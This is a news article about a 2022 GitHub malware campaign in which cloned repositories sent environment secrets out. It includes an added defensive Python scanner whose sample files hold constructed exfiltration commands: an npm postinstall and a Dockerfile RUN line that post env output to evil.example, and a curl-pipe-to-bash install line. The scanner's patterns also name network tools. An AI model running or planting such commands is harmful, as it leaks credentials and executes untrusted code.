Major developer platform GitHub was hit by a widespread malware campaign: a developer reported roughly 35,000 "code hits" for the malicious code, on the same day that millions of dollars were drained from Solana-based wallets.
Developer Stephen Lacy, who first reported the incident earlier on Wednesday, ran into the malicious code while reviewing a project he had found through a Google search.
I am uncovering what seems to be a massive widespread malware attack on @github.
– Currently over 35k repositories are infected
– So far found in projects including: crypto, golang, python, js, bash, docker, k8s
– It is added to npm scripts, docker images and install docs pic.twitter.com/rq3CBDw3r9
— Stephen Lacy (@stephenlacy) August 3, 2022
So far the malicious code has been found in projects spanning crypto, Golang, Python, JavaScript, Bash, Docker and Kubernetes. It is inserted into Docker images, installation documents and npm scripts, the scripts section of a project's package.json that bundles common shell commands; npm runs some of these scripts (lifecycle hooks such as postinstall) automatically during installation, so a developer need not type anything for them to execute.
To trick developers, the attacker first creates a fake repository (a repository contains all of a project's files together with the revision history of each file) and pushes clones of legitimate projects to GitHub with the malicious code added. For example, the following two snapshots show a legitimate cryptocurrency miner project and its clone.
Many of these cloned repositories were also pushed as "pull requests", the GitHub mechanism by which a developer proposes changes from a branch or fork to another repository.
Once a developer runs the poisoned code, the full set of environment variables (ENV) of the script, the application or the laptop (in the case of Electron apps) is sent to the attacker's server. That environment typically includes security keys, Amazon Web Services access keys, crypto keys and much more.
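The three places the article names (npm scripts, Docker images and installation docs) share one signature: a command that dumps the environment and hands it to a network tool. The scanner below is an added example written for this article, not code from the original page or from any of the cloned projects. It applies that heuristic to a project checkout and, as a generalization of the same idea, also flags install-doc one-liners that pipe downloaded content straight into a shell. All sample files are constructed for the demo, and evil.example is a placeholder host, not the attacker's real server.

```python
"""Heuristic scanner for install-time environment exfiltration.

Added example for this article; not code from the original page or from
any of the affected projects. It looks for commands that read the whole
environment (env, printenv, process.env, ...) and pass it to a network
tool, hidden where they run automatically or get copied and pasted: npm
lifecycle scripts, Dockerfile RUN lines and README install instructions.
Sample files below are constructed; evil.example is a placeholder host.
"""
import json
import re
from typing import Dict, List, Optional, Tuple

# Reads the whole environment. The lookahead skips assignments (FOO=bar),
# and the match is case-sensitive so a Dockerfile "ENV" line is not a hit.
ENV_DUMP = re.compile(
    r"\b(printenv|env)\b(?!\s*=)|/proc/self/environ|process\.env\b|os\.environ\b"
)
# Anything that can move bytes off the machine.
NETWORK = re.compile(
    r"\b(curl|wget|nc|ncat|socat)\b|fetch\(|requests\.(post|get)\(|https?://"
)
# Fetched content executed immediately: the classic install-doc one-liner.
PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba|z|da)?sh\b")
# npm runs these during `npm install` without the developer typing them.
NPM_LIFECYCLE = {"preinstall", "install", "postinstall", "prepare",
                 "prepublish", "prepublishOnly"}

Finding = Tuple[str, str, str, str]  # (file, location, kind, command)


def classify(command: str) -> Optional[str]:
    """Rank one command: 'exfil' (reads env AND talks to the network),
    'remote-exec' (pipes fetched content into a shell), 'network', 'env',
    or None when nothing of interest is present."""
    dumps = bool(ENV_DUMP.search(command))
    net = bool(NETWORK.search(command))
    if dumps and net:
        return "exfil"
    if net and PIPE_TO_SHELL.search(command):
        return "remote-exec"
    if net:
        return "network"
    if dumps:
        return "env"
    return None


def scan_package_json(text: str, source: str) -> List[Finding]:
    """Lifecycle scripts are flagged for any network or env access, because
    they run unattended; other scripts only for the full exfil pattern."""
    findings: List[Finding] = []
    for name, cmd in json.loads(text).get("scripts", {}).items():
        kind = classify(cmd)
        if kind == "exfil" or (kind and name in NPM_LIFECYCLE):
            findings.append((source, f"scripts.{name}", kind, cmd))
    return findings


def scan_lines(text: str, source: str) -> List[Finding]:
    """Line-oriented scan for Dockerfiles, shell scripts and docs."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        kind = classify(line)
        if kind in ("exfil", "remote-exec"):
            findings.append((source, f"line {lineno}", kind, line.strip()))
    return findings


def scan_project(files: Dict[str, str]) -> List[Finding]:
    """files maps a path inside the checkout to its contents."""
    findings: List[Finding] = []
    for path, text in files.items():
        if path.endswith("package.json"):
            findings.extend(scan_package_json(text, path))
        else:
            findings.extend(scan_lines(text, path))
    return findings


# Constructed sample checkout (hypothetical project name and host).
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "legit-looking-tool",
    "scripts": {
        "build": "tsc -p .",
        "test": "jest",
        # Runs on every `npm install` and posts the whole environment.
        "postinstall": 'curl -s -X POST --data-binary "$(env)" https://evil.example/collect',
    },
})
SAMPLE_DOCKERFILE = """\
FROM node:18
WORKDIR /app
COPY . .
RUN npm ci
# Constructed: the same exfiltration, hidden in an image build step.
RUN env | curl -s -X POST --data-binary @- https://evil.example/collect
CMD ["node", "server.js"]
"""
SAMPLE_README = """\
## Install

    $ git clone https://github.com/example/legit-looking-tool
    $ cd legit-looking-tool
    $ curl -sSL https://evil.example/setup.sh | bash
"""
SAMPLE_FILES = {"package.json": SAMPLE_PACKAGE_JSON,
                "Dockerfile": SAMPLE_DOCKERFILE,
                "README.md": SAMPLE_README}

if __name__ == "__main__":
    for path, where, kind, cmd in scan_project(SAMPLE_FILES):
        print(f"{kind:12} {path}:{where}  {cmd}")
```

The scanner is deliberately noisy in one direction: a lifecycle script that merely fetches a URL is reported even without an env dump, since that is where a download-and-execute stage would sit. Treat each finding as a prompt to read the command, and run the scan on a fresh clone before `npm install` or `docker build` rather than after, because by then the hook has already executed.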
The developer has reported the issue to GitHub and has advised developers to GPG-sign every revision they make to a repository. GPG keys add a layer of security to GitHub accounts and software projects by letting anyone verify that each revision came from a key the maintainer controls. That check only helps, however, if the person pulling the code actually verifies the signatures against the maintainer's published key and confirms the repository is the project's canonical upstream: an attacker can sign the commits in a clone with a key of their own, so a green "verified" badge on its own proves nothing about which repository you are installing from.
Clarification: The information and/or opinions expressed in this article do not necessarily represent the views or editorial line of Cointelegraph. The information set forth herein should not be taken as financial advice or investment recommendation. All investment and commercial movement involve risks and it is the responsibility of each person to do their due research before making an investment decision.